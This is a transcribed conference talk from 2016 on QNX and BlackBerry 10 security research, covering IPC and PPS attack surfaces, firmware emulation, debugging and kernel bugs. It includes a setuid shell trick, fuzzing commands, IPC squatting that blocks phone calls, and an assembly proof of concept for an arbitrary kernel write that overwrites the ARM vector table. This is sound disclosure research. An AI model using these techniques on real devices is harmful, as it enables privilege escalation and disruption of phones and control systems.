SlideShare a Scribd company logo

[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Microkernel ain't one!

PROIDEA
PROIDEA

Cars, Turbines, Safety Critical Systems and consumer devices (phones) all run QNX, however, very little security research has been performed in this area. This talk will provide an overview of QNX security architecture with Blackberry 10 used as the primary target. We will discuss research on a locked down highly secured OS, the OS attack surface and our method for identifying weaknesses within the QNX OS. We will cover our methods of identifying vulnerabilities from both a reverse engineering perspective and automated fuzzing. This talk will provide a good overview of how the subsystems on QNX communication and how an attacker would attempt to elevate their privileges. We will also talk about some of the weaknesses identified with this on-going research and the challenges faced with exploit development on the platform.

Technology
1 of 55
Download to read offline
++ MWR Labs QNX: 99 Problems but a Microkernel ain’t one! Alex Plaskett and Georgi Geshev 20th May 2016
++ Introduction + Attacking BlackBerry 10 OS + Generic QNX Attack Research + Very Different Architectural Features + Limited Public Security Research + See Appendix + Still Ongoing Research... Introduction
MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
++ QNX Architecture Background Westinghouse and Atomic Energy of Canada Limited (AECL) It is hard to imagine an application more critical than a nuclear power plant; failure there can have large scale catastrophic results. Both Westinghouse and AECL chose QNX Neutrino for its uncompromising reliability in complex real-time control systems. http://www.qnx.com/images/logos/ia_customer_logos/IA%20Customer%20Success.doc Air Traffic Control Systems Without reliable ATC systems, planes would be banging into one another like there’s no tomorrow. I’m not at liberty to tell you which airports use QNX-based ATC systems, but there are lots of them, worldwide. http://onqpl.blogspot.com/2008/03/10-qnx-systems-that-could-save-your.html General Electric The Mark VI Turbine Controller is a scalable workhorse control that can be applied to small systems such as an industrial steam turbine control, large gas turbine control systems, and plant controls, and uses QNX to control the precise timing required. Why is QNX security important?
++ QNX Architecture Background QNX Security History (QNX 6.0 – 6.5) Vulnerability Class Memory Corruption Setuid logic bugs Kernel Issues Linker Issues Insecure Permissions Info Leaks
++ QNX Architecture Background + Handful of CVE IDs Assigned to QNX Bugs + QConnDoor, Photon (phrelay, phgrafx) + Although multiple security issues found, possibly internally, and fixed between QNX 6.5 and BB 10 OS. + Source was released at one point 2007 and then closed again. + Dingleberry Playbook root was a backup and restore problem exploited through Samba config. Nothing QNX specific though. + Possible to root some misconfigured older QNX if pdebug is running. QNX Security History (QNX 6.0 – 6.5)
++ QNX Architecture Background + ASLR (QNX 6.5) + Guard Pages, Stack and Heap Cookies, NX, PIE, RELRO + Process Manager Abilities + Photon Windows Manager Removed + No SUID Binaries (BB 10 OS) + Principle of Least Privilege (BB 10 OS) QNX Security Hardening (QNX 6.5 - BB10 OS)
++ QNX Architecture Background + Microkernel OS + Threading, Signalling, Scheduling, Message Passing + No FS, Network Stacks, etc. + Robust IPC Mechanisms + Reduced Kernel Attack Surface + Fault Tolerant QNX Architecture Background
++ QNX Architecture Background + Implemented in Kernel + Synchronous Message Passing + MsgSend(); + MsgReceive(); + MsgReply(); + Blocking QNX Message Passing
++ QNX Architecture Background + Server + ChannelCreate(); / name_attach(); + ChannelDestroy(); + Client + ConnectAttach(); / name_open(); + ConnectDetach(); QNX Message Passing Channels
++ QNX Architecture Background + Process management + Creation, destruction, attributes + Memory management + Memory protection, shared libraries + Pathname management QNX Microkernel and Process Manager (PROCNTO)
++ QNX Architecture Background + spawn(); _PROC_SPAWN + posix_spawn(); _PROC_POSIX_SPAWN + fork(); _PROC_FORK QNX Process Manager
++ QNX Architecture Background QNX Process Manager malloc(); mmap(); MsgSendv(); return msg.o.addr; MsgReceivev(); memmgr_map(); vmm_mmap(); map_create(); pa_alloc(); pte_manipulate(); MsgReplyv(); User Process Process Manager _MEM_MAP
++ QNX Architecture Background QNX Process Manager malloc(); mmap(); MsgSendv(); return msg.o.addr; MsgReceivev(); memmgr_map(); vmm_mmap(); map_create(); pa_alloc(); pte_manipulate(); MsgReplyv(); User Process Process Manager _MEM_MAP
++ QNX Architecture Background QNX Path Manager
++ QNX Architecture Background + User Space Processes + Path Manager Namespace + Functions of Interest + resmgr_attach(); + io_func_init(); + message_attach(); QNX Resource Managers
++ QNX Architecture Background $ ls -al /pps/services/bluetooth/public/control -rw-rw-rw- 1 pps-bt-media bluetooth 9 Sep 25 06:09 /pps/services/bluetooth/public/control $ echo "msg::lockDevicendat::Backup Interrupted at BBBB” >> /pps/system/navigator/background QNX Persistent Publish Subscribe (PPS)
MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
++ Attacking QNX Messaging Attacking QNX Messaging (Endpoints) Client Sandbox Trust Boundary IPC Trust Boundary MsgSend(); Malicious Process Core Component Server Sandbox Trust Boundary
++ Attacking QNX Messaging Attacking QNX Messaging (Endpoints) + /dev/name/[ local | global ]/* name_attach_t * name_attach(dispatch_t *dpp, const char * path, unsigned flags); nrw-rw-rw- 1 root nto 0 Mar 12 12:47 VirtualEventServer nrw-rw-rw- 1 root nto 0 Mar 12 12:47 battmgr nrw-rw-rw- 1 root nto 0 Mar 12 12:47 battmgr_monitor dr-xr-xr-x 2 root nto 0 Mar 12 12:47 csm dr-xr-xr-x 2 root nto 0 Mar 12 12:47 gltracelogger nrw-rw-rw- 1 root nto 0 Mar 12 12:47 led_control nrw-rw-rw- 1 root nto 0 Mar 12 12:47 phone-service nrw-rw-rw- 1 root nto 0 Mar 12 12:47 publisher_channel nrw-rw-rw- 1 root nto 0 Mar 12 12:47 slogger2 nrw-rw-rw- 1 root nto 0 Mar 12 12:47 svga_ch
++ Attacking QNX Messaging + /proc/mount/* + (Node ID, Process ID, Channel ID, Handle, File Type) (Node Id, Process Id, Chan Id) Attacking QNX Messaging (Endpoints) dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,1089563,4,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,1282089,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,2035752,2,8,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,3067978,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,3076171,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,5345418,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,5349515,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,61450,4,0,11 drwxr-xr-x 10 root nto 4096 Mar 12 12:46 0,61450,4,6,0 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,8195,1,1,4
++ Attacking QNX Messaging Attacking QNX Messaging (Client Side) int coid; char rmsg[255]; char *smsg = “Fuzz this message”; // Node Descriptor, Process ID, Channel ID coid = ConnectAttach(0, 77, 1, 0, 0); if (MsgSend(coid, smsg, strlen(smsg+1), rmsg, 255) == -1) { exit(EXIT_FAILURE); }
++ Attacking QNX Messaging Attacking QNX Messaging (Server Side) if ((attach = name_attach(NULL, ATTACH_POINT,0) == NULL) { return EXIT_FAILURE; } while (1) { rcvid = MsgReceive(attach->chid, &msg, sizeof(msg),NULL); }
MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
++ Attacking QNX PPS + Identify Writable PPS Endpoints for endpoint in $(find /pps –type f); do if [ -w $endpoint ]; then echo $endpoint; fi; done Attacking QNX PPS
++ Attacking QNX PPS + Identify PPS Message Format + Reverse Engineering + QNX Persistent Publish/Subscribe Developer's Guide + Sample Messages + Multitude of Provisioning Shell Scripts Attacking QNX PPS
++ Attacking QNX PPS + Fuzzing PPS messages echo "command::connect_servicendata::D5:DA:8E:43 :ED:68n data2::0x1101:453994D5-D58B-96F9- 6616-B37F586BA2EC" | radamsa >> /pps/services/bluetooth/control Attacking QNX PPS
++ Attacking QNX PPS + Special QNX DOM Object + Exposing Native Components qnx.webplatform.pps.syncWritePPSObject('msg::xyz','/pps/endpoint'); HTML5 WebWorks Applications
MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
++ QNX Firmware 1. BB10 Native SDK (GCC, GDB) 2. QNX Trial 6.5 VMWare Image (mkifs, dumpifs) 3. QNX Portal (BSP Images – Beagle Board) 4. Sachesi for Playbook / BB10 QNX Firmware Tools
++ QNX Firmware 1. Sachesi download of updates (BB10 / Playbook) 2. QNX Car Infotainment Updates (Toyota etc.) 3. Extraction of IFS image from live device (/.boot/) 4. Some BSP components from MyQNX website QNX Firmware Acquisition
++ QNX Firmware 1. Beagle - bsp-nto650-ti-omap3530-beagle-1.0.0- 201111030508.zip 2. Locate IFS image (from firmware / BSP) – e.g. ifs-extbox.bin 3. Create NAND image (Combine IFS and bootloader) 1) mknand.sh car.img ifs-extbox.bin 2) nand_ecc car.img 0x0 0xe80000 3) qemu-system-arm -M beagle -m 256 -mtdblock car.img -nographic 4) nand read 0x80100000 0x280000 0x400000; go 0x8010000 == Toyota Extension Box Boot IFS == == Variant:EU-Low HWRev:Gamma Arch:armle-v7 == == built by DMiller on Wed Dec 7 19:45:38 2011 == QNX Booting ARM in QEMU
++ QNX Firmware 1. mkifs and dumpifs is part of the QNX VMware image 2. We have all the necessary binaries from existing firmware extraction 3. Create a minimal .build script (all we really need is BSP startup, kernel and shell binaries). 4. These binaries can be extracted from existing firmware or ported from other BSPs (e.g. startup- omap3530). 5. mkifs -r stage -vv custom.build qnx.ifs 6. Append bootloaders (mknand.sh) 7. Boot with QEMU 8. Integrate code compiled with BB10 toolchain into image by adding reference in .build script QNX Creating Custom ARM Images
MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
++ QNX Debugging + Limited shell visibility as devuser + Info leak vulnerability (sysctl –a) + Root simulator / get core dumps (/var/log) / X86 only service launcher start/flags run /bin/sh - cp /bin/ksh /tmp chmod u+s /tmp/ksh QNX Userland Debugging (QCONN)
++ QNX Debugging (gdb) target qnx <device_IP_address>:8000 (gdb) attach <pid> (gdb) file /path/to/app/executable/on/the/host (gdb) set solib-search-path $HOST_QTDIR/lib:$HOST_QTDIR/plugins/xyz/:$BBNDK /target_<version>/qnx6/armle- v7/lib/:$BBNDK/target_<version>/qnx6/ armle-v7/usr/lib (gdb) b main QNX Userland Debugging (GDB)
++ QNX Debugging + Browser Exploitation WebView { id: webView url: http://192.168.0.5:8080 } https://github.com/alexplaskett/QNXSecurity/ blob/master/blackberry_monitor.py QNX Userland Debugging (WebKit)
++ QNX Debugging 1. KDEBUG is the QNX kernel debugger 2. Old source code for this is on sourceforge (http://sourceforge.net/p/monartis/openqnx/ci/master/tree/) 3. Can use BB10 toolchain to build KDEBUG and integrate into BSP image (as previous slide) 4. Allows kernel debugging on X86 QNX 6.* images 5. QNX 8.0, limited to VMWare GDBStub currently and no ARM support: debugStub.listen.guest32 = “true” 6. Allows memory inspection but no breakpoint support 7. Ideally we want to kernel debug on BB10 OS ARM  QNX Kernel Debugging
MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
++ QNX Kernel Security + BB10 OS 85 syscalls vs Linux 300 ish QNX Kernel Security Overview (procnto)
++ QNX Kernel Security + User Mappings: 00000000-7fffffff + Kernel Mappings: 80000000-ffffffff + Mapping the null page is protected (EPERM) + No KASLR + Fixed location of certain code / data: ff800000-ffbfffff maps page tables that map 00000000-ffffffff ffff0000-ffff0fff trap vector table for processors with vector adjust fe000000-ff7fffff maps boot programs (kdebug/procnto) ffff1000-ffff1fff cpupage on SMP systems QNX Kernel Memory Layout (BB10 - ARM)
++ QNX Kernel Security LOAD:00042F38 EXPORT ChannelCreate LOAD:00042F38 ChannelCreate ; CODE XREF: j_MsgPause_r+8j LOAD:00042F38 ; j_ld_imposter_exit+8j ... LOAD:00042F38 STMFD SP!, {LR} LOAD:00042F3C MOV R12, #0x23 ; '#' LOAD:00042F40 SVC 0x51 ; 'Q' LOAD:00042F44 LDMFD SP!, {PC} QNX Kernel Syscall (libc.so – kercalls.h)
++ QNX Kernel Security LOAD:FE11B2CC ker_call_table DCD __KER_NOP ; DATA XREF: __ker_entry+80o LOAD:FE11B2CC ; LOAD:off_FE0B66CCo ... LOAD:FE11B2D0 DCD __KER_TRACE_EVENT LOAD:FE11B2D4 DCD __KER_RING0 LOAD:FE11B2D8 DCD __KER_CACHE_FLUSH LOAD:FE11B2DC DCD __KER_SPARE LOAD:FE11B2E0 DCD __KER_SPARE LOAD:FE11B2E4 DCD __KER_SPARE QNX Kernel Syscall Table
++ QNX Kernel Security Int kdecl ker_call_name (THREAD *act, struct kerargs_something * kap) { // Validate ptr’s passed in kap } #define RD_VERIFY_PTR(thp, p, size) if(!WITHIN_BOUNDRY((uintptr_t)(p),(uintptr_t)(p)+(size),(thp)->process- >boundry_addr)) return EFAULT; #define WR_VERIFY_PTR(thp, p, size)if(!WITHIN_BOUNDRY((uintptr_t)(p),(uintptr_t)(p)+(size),(thp)->process- >boundry_addr)) return EFAULT; + Monartis QNX code shows this. Same technique in 8.0 + Created a syscall fuzzer (https://github.com/alexplaskett/QNXSecurity/tree/master/SyscallFuzz) + New syscalls added for BB10 QNX Kernel System Call
MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
++ QNX Vulnerabilities + Disclaimer: Redacted some unfixed bugs! def send_sync(self,coid,buf,size): ret = self.libc.MsgSend(coid,buf,size,0,0); + Navigation UI Crash + Phone-Service Crash + Z10 Reboot Panics (Watchdog process) + Static reverse engineering to confirm bugs Vulnerabilities - IPC
++ QNX Vulnerabilities + Crash the endpoint then quickly register that name. + Any user can bind within this namespace + libc.name_attach(0,b"phone-service",0) + Allows getting messages destined to that process if process uses name_open again and no check on client id. + Blocks the phone from making outbound calls Vulnerabilities – IPC Squatting
++ QNX Vulnerabilities + Terminates all running applications (as Android application) + Fixed in an upcoming release Vulnerabilities - Navigator PPS $ echo $USER devuser $ echo <redacted> > /pps/system/navigator/control sh: cannot create /pps/system/navigator/control: Permission denied $ ... $ echo $USER apps $ echo <redacted> > /pps/system/navigator/control $ echo $? $ 0
++ QNX Vulnerabilities + QNX 6.5 (2 exploitable bugs / 6 issues identified) + Found perfect bug in Monartis source – does not affect BB10 OS kernel though  + Arbitrary kernel read/write primitive – easily exploitable + Blackberry aware of this and fixed in later versions + Still might be useful for exploiting older QNX systems. + Other outstanding kernel issues in BB10 - I cant disclose currently  Vulnerabilities - Kernel
++ QNX Vulnerabilities ldr ip, [r0] ; ptr to word being tested (no bounds check on R0) teq ip, r1 ; value to compare streq r2, [r0] ; value to set (WRITE HERE) mov r0, ip mrs ip, spsr bicne ip, ip, #ARM_CPSR_Z orreq ip, ip, #ARM_CPSR_Z msr spsr, ip movs pc, lr Vulnerabilities - __emu_cmpxchg
++ QNX Vulnerabilities __asm__( "ldr r0,=0xffff0000n" // Reset vector location "ldr r1,=0xe59ff018n" // Value to compare (what the location in memory was before) "ldr r2,=0x41414141n" // Value to write "ldr ip,=0xff000000n" // To trigger __emu_cmpxchg "swi 0n" : : ); + Demonstrates overwriting the ARM EVT table entries. Vulnerabilities - __emu_cmpxchg
++ QNX Vulnerabilities + Boot BB10 kernel in QEMU (Emulate Qualcomm MSM 8960 BSP?). + Port old KDEBUG to ARM? + Further crash analysis + Improve IFS unpacking / repacking tools + Improve fuzzers + Investigate the Android PRIV for comparison Next Stages
++ MWR Labs + Blackberry responsive to fixing issues + BB10 Core OS fairly high quality / robust against memory corruption exploitation + However, BB just switched to Android (PRIV etc). + Lack of debug visibility makes exploit development challenging + Older versions of QNX contain multiple non-public vulnerabilities + Not too many interesting crashes identified from fuzzing + All the marketing budget spent on security?  Conclusion
@mwrlabs - https://labs.mwrinfosecurity.com/system/assets/410/original/mwri_blackberry-10-security_2013-06-03.pdf @esizkur - https://www.youtube.com/watch?v=z5qXhgqw5Gc @quine / @bnull - https://cansecwest.com/slides/2014/NoApologyRequired-BB10-CanSecWest2014.pdf https://speakerdeck.com/quine/voight-kampffing-the-blackberry-playbook-v2 @alexanderantukh - https://www.sec- consult.com/fxdata/seccons/prod/downloads/sec_consult_vulnerability_lab_blackberry_z10_initial_analysis_v10.pdf @juliocesarfort - https://packetstormsecurity.com/files/author/3551/ @timb_machine - http://seclists.org/fulldisclosure/2014/Mar/98 @0xcharlie / @nudehaberdasher - http://illmatics.com/Remote%20Car%20Hacking.pdf Previous Research / Credits
MWR Labs + @mwrlabs https://labs.mwrinfosecurity.com/ + Whitepaper available https://labs.mwrinfosecurity.com/publications/qnx- architectural/ + Publishing code shortly: https://github.com/alexplaskett/QNXSecurity Images sourced from: www.qnx.com/download/download/11966/sys_arch.pdf Questions?

Recommended

Nytro-XV_NWD_VM_Performance_Acceleration
Nytro-XV_NWD_VM_Performance_AccelerationNytro-XV_NWD_VM_Performance_Acceleration
Nytro-XV_NWD_VM_Performance_AccelerationKhai Le
 
PXC (Xtradb) Failure and Recovery
PXC (Xtradb) Failure and RecoveryPXC (Xtradb) Failure and Recovery
PXC (Xtradb) Failure and RecoveryAlkin Tezuysal
 
Secure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSecure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSBA Research
 
Hardware assisted virtualization in AV software (ZeroNights 2014)
Hardware assisted virtualization in AV software (ZeroNights 2014)Hardware assisted virtualization in AV software (ZeroNights 2014)
Hardware assisted virtualization in AV software (ZeroNights 2014)Python0x0
 
SecurityPI - Hardening your IoT endpoints in Home.
SecurityPI - Hardening your IoT endpoints in Home. SecurityPI - Hardening your IoT endpoints in Home.
SecurityPI - Hardening your IoT endpoints in Home. LinuxCon ContainerCon CloudOpen China
 
Mobile Programming - Network Universitas Budi Luhur
Mobile Programming - Network Universitas Budi LuhurMobile Programming - Network Universitas Budi Luhur
Mobile Programming - Network Universitas Budi LuhurRiza Fahmi
 
High Performance Linux Virtual Machine on Microsoft Azure: SR-IOV Networking ...
High Performance Linux Virtual Machine on Microsoft Azure: SR-IOV Networking ...High Performance Linux Virtual Machine on Microsoft Azure: SR-IOV Networking ...
High Performance Linux Virtual Machine on Microsoft Azure: SR-IOV Networking ...LinuxCon ContainerCon CloudOpen China
 
VPC Implementation In OpenStack Heat
VPC Implementation In OpenStack HeatVPC Implementation In OpenStack Heat
VPC Implementation In OpenStack HeatSaju Madhavan
 

Recommended

Nytro-XV_NWD_VM_Performance_Acceleration
Nytro-XV_NWD_VM_Performance_AccelerationNytro-XV_NWD_VM_Performance_Acceleration
Nytro-XV_NWD_VM_Performance_AccelerationKhai Le
 
PXC (Xtradb) Failure and Recovery
PXC (Xtradb) Failure and RecoveryPXC (Xtradb) Failure and Recovery
PXC (Xtradb) Failure and RecoveryAlkin Tezuysal
 
Secure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSecure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSBA Research
 
Hardware assisted virtualization in AV software (ZeroNights 2014)
Hardware assisted virtualization in AV software (ZeroNights 2014)Hardware assisted virtualization in AV software (ZeroNights 2014)
Hardware assisted virtualization in AV software (ZeroNights 2014)Python0x0
 
SecurityPI - Hardening your IoT endpoints in Home.
SecurityPI - Hardening your IoT endpoints in Home. SecurityPI - Hardening your IoT endpoints in Home.
SecurityPI - Hardening your IoT endpoints in Home. LinuxCon ContainerCon CloudOpen China
 
Mobile Programming - Network Universitas Budi Luhur
Mobile Programming - Network Universitas Budi LuhurMobile Programming - Network Universitas Budi Luhur
Mobile Programming - Network Universitas Budi LuhurRiza Fahmi
 
High Performance Linux Virtual Machine on Microsoft Azure: SR-IOV Networking ...
High Performance Linux Virtual Machine on Microsoft Azure: SR-IOV Networking ...High Performance Linux Virtual Machine on Microsoft Azure: SR-IOV Networking ...
High Performance Linux Virtual Machine on Microsoft Azure: SR-IOV Networking ...LinuxCon ContainerCon CloudOpen China
 
VPC Implementation In OpenStack Heat
VPC Implementation In OpenStack HeatVPC Implementation In OpenStack Heat
VPC Implementation In OpenStack HeatSaju Madhavan
 
Mobile Programming - 3 UDP
Mobile Programming - 3 UDPMobile Programming - 3 UDP
Mobile Programming - 3 UDPRiza Fahmi
 
OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728
OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728
OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728jieun kim
 
Open stack day 2014 havana from grizzly
Open stack day 2014 havana from grizzlyOpen stack day 2014 havana from grizzly
Open stack day 2014 havana from grizzlyChoe Cheng-Dae
 
Kernel Recipes 2015 - Porting Linux to a new processor architecture
Kernel Recipes 2015 - Porting Linux to a new processor architectureKernel Recipes 2015 - Porting Linux to a new processor architecture
Kernel Recipes 2015 - Porting Linux to a new processor architectureAnne Nicolas
 
CloudStackユーザ会〜仮想ルータの謎に迫る
CloudStackユーザ会〜仮想ルータの謎に迫るCloudStackユーザ会〜仮想ルータの謎に迫る
CloudStackユーザ会〜仮想ルータの謎に迫るsamemoon
 
Secure lustre on openstack
Secure lustre on openstackSecure lustre on openstack
Secure lustre on openstackJames Beal
 
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみる
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみるK8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみる
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみるJUNICHI YOSHISE
 
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA Architecture
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA ArchitectureRed Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA Architecture
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA ArchitectureEtsuji Nakai
 
kdump: usage and_internals
kdump: usage and_internalskdump: usage and_internals
kdump: usage and_internalsLinuxCon ContainerCon CloudOpen China
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisAnne Nicolas
 
Elastic 101 tutorial - Percona Europe 2018
Elastic 101 tutorial - Percona Europe 2018 Elastic 101 tutorial - Percona Europe 2018
Elastic 101 tutorial - Percona Europe 2018 Antonios Giannopoulos
 
Percona XtraDB 集群内部
Percona XtraDB 集群内部Percona XtraDB 集群内部
Percona XtraDB 集群内部YUCHENG HU
 
Vbox virtual box在oracle linux 5 - shoug 梁洪响
Vbox virtual box在oracle linux 5 - shoug 梁洪响Vbox virtual box在oracle linux 5 - shoug 梁洪响
Vbox virtual box在oracle linux 5 - shoug 梁洪响maclean liu
 
PuppetConf 2016: Nano Server, Puppet, and DSC
PuppetConf 2016: Nano Server, Puppet, and DSCPuppetConf 2016: Nano Server, Puppet, and DSC
PuppetConf 2016: Nano Server, Puppet, and DSCMichael Smith
 
BlueHat v18 || A mitigation for kernel toctou vulnerabilities
BlueHat v18 || A mitigation for kernel toctou vulnerabilitiesBlueHat v18 || A mitigation for kernel toctou vulnerabilities
BlueHat v18 || A mitigation for kernel toctou vulnerabilitiesBlueHat Security Conference
 
Trove Updates - Kilo Edition
Trove Updates - Kilo EditionTrove Updates - Kilo Edition
Trove Updates - Kilo EditionOpenStack Foundation
 
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...The Linux Foundation
 
On-Demand Image Resizing
On-Demand Image ResizingOn-Demand Image Resizing
On-Demand Image ResizingJonathan Lee
 
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...BlueHat Security Conference
 
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCanSecWest
 
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...PROIDEA
 
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...PROIDEA
 

More Related Content

What's hot

Mobile Programming - 3 UDP
Mobile Programming - 3 UDPMobile Programming - 3 UDP
Mobile Programming - 3 UDPRiza Fahmi
 
OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728
OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728
OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728jieun kim
 
Open stack day 2014 havana from grizzly
Open stack day 2014 havana from grizzlyOpen stack day 2014 havana from grizzly
Open stack day 2014 havana from grizzlyChoe Cheng-Dae
 
Kernel Recipes 2015 - Porting Linux to a new processor architecture
Kernel Recipes 2015 - Porting Linux to a new processor architectureKernel Recipes 2015 - Porting Linux to a new processor architecture
Kernel Recipes 2015 - Porting Linux to a new processor architectureAnne Nicolas
 
CloudStackユーザ会〜仮想ルータの謎に迫る
CloudStackユーザ会〜仮想ルータの謎に迫るCloudStackユーザ会〜仮想ルータの謎に迫る
CloudStackユーザ会〜仮想ルータの謎に迫るsamemoon
 
Secure lustre on openstack
Secure lustre on openstackSecure lustre on openstack
Secure lustre on openstackJames Beal
 
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみる
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみるK8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみる
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみるJUNICHI YOSHISE
 
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA Architecture
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA ArchitectureRed Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA Architecture
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA ArchitectureEtsuji Nakai
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisAnne Nicolas
 
Elastic 101 tutorial - Percona Europe 2018
Elastic 101 tutorial - Percona Europe 2018 Elastic 101 tutorial - Percona Europe 2018
Elastic 101 tutorial - Percona Europe 2018 Antonios Giannopoulos
 
Percona XtraDB 集群内部
Percona XtraDB 集群内部Percona XtraDB 集群内部
Percona XtraDB 集群内部YUCHENG HU
 
Vbox virtual box在oracle linux 5 - shoug 梁洪响
Vbox virtual box在oracle linux 5 - shoug 梁洪响Vbox virtual box在oracle linux 5 - shoug 梁洪响
Vbox virtual box在oracle linux 5 - shoug 梁洪响maclean liu
 
PuppetConf 2016: Nano Server, Puppet, and DSC
PuppetConf 2016: Nano Server, Puppet, and DSCPuppetConf 2016: Nano Server, Puppet, and DSC
PuppetConf 2016: Nano Server, Puppet, and DSCMichael Smith
 
BlueHat v18 || A mitigation for kernel toctou vulnerabilities
BlueHat v18 || A mitigation for kernel toctou vulnerabilitiesBlueHat v18 || A mitigation for kernel toctou vulnerabilities
BlueHat v18 || A mitigation for kernel toctou vulnerabilitiesBlueHat Security Conference
 
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...The Linux Foundation
 
On-Demand Image Resizing
On-Demand Image ResizingOn-Demand Image Resizing
On-Demand Image ResizingJonathan Lee
 
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...BlueHat Security Conference
 
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCanSecWest
 

What's hot (20)

Mobile Programming - 3 UDP
Mobile Programming - 3 UDPMobile Programming - 3 UDP
Mobile Programming - 3 UDP
 
OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728
